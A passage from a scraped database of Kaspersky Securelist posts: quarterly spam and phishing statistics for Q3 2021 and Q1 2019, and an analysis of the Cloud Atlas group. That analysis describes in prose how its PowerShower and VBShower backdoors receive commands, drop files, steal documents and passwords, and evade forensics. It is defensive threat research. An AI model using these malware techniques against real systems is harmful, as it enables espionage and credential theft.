The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. 
and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. 
Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. 
The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. 
compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. 
Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. 
We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. 
Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. 
The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. 
Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company's products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. 
Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). 
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. 
But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. 
The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). 
The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. 
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. 
against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. 
We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor, mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victim - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation Editor vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. 
During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blog post (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences between the two versions reside mostly in the anti-forensics features of the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the ZIP magic \"PK\". The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. After executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. 
\n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the open-source tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And its new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain that no longer relies on PowerShower directly after infection, but instead executes a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower**, which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to evade IoC-based defence, as each piece of code is unique per victim, so it can't be searched for by file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy as the validator version of PowerShower. 
Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. 
